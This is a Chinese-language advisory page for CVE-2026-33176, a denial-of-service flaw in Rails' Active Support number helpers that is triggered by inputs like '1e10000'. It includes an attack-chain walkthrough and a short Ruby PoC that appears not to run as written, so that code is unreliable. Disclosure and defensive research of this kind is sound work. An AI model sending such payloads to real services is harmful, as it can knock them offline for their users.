CVE-2026-33176 CVSS 7.5 高危

CVE-2026-33176 Active Support 拒绝服务漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33176

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Active Support

漏洞概述

Active Support 是 Ruby on Rails 框架的核心支持库。在 8.1.2.1、8.0.4.1 和 7.2.3.1 版本之前，该库的数字辅助方法存在安全缺陷。当处理包含科学计数法（如 `1e10000`）的字符串时，`BigDecimal` 会将其展开为极大的十进制形式。格式化这些数字会导致过度的内存分配和 CPU 消耗，攻击者可利用此漏洞引发拒绝服务。

技术细节

该漏洞的根源在于 Active Support 对数字格式化的处理机制。当应用使用受影响版本中的辅助函数（如 `number_to_human` 等）处理特定格式的字符串时，若输入为包含大指数的科学计数法，系统会调用 `BigDecimal` 进行转换。由于 `BigDecimal` 需要为展开后的数字分配足够的内存并执行计算，像 `1e10000` 这样的输入会生成巨大的字符串对象。这会导致服务器资源（内存和 CPU）在短时间内被耗尽，从而无法处理正常请求。攻击者无需进行身份认证，只需发送特制的恶意数据包即可触发此漏洞。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用程序使用了 Ruby on Rails 框架及受影响版本的 Active Support 库。

STEP 2

构造载荷

攻击者构造包含极大指数的科学计数法字符串（例如 '1e10000'），该字符串能被 `BigDecimal` 解析但会导致极大的资源消耗。

STEP 3

发送请求

攻击者通过网络向目标应用端的数字辅助处理接口发送包含恶意载荷的 HTTP 请求。

STEP 4

资源耗尽

服务器尝试格式化该数字，导致内存激增和 CPU 飙升，最终导致服务不可用（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33176: Active Support DoS via Scientific Notation
require 'active_support/all'
require 'active_support/core_ext/numeric/conversions'

# Define a payload using scientific notation that expands massively
payload = "1e10000"

puts "Sending payload to number helper..."

begin
  # This function triggers the vulnerability in affected versions
  # by causing BigDecimal to expand the string excessively.
  formatted = number_to_human(payload)
  puts "Formatted result: #{formatted}"
rescue => e
  puts "Exception caught: #{e.message}"
end

影响范围

Active Support < 8.1.2.1

Active Support < 8.0.4.1

Active Support < 7.2.3.1

防御指南

临时缓解措施

若无法立即升级，建议在应用程序的网关或控制器层添加输入过滤规则，检测并拦截包含 'e' 或 'E' 字符的数值输入，防止其传递到后端的 Active Support 数字处理函数中。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表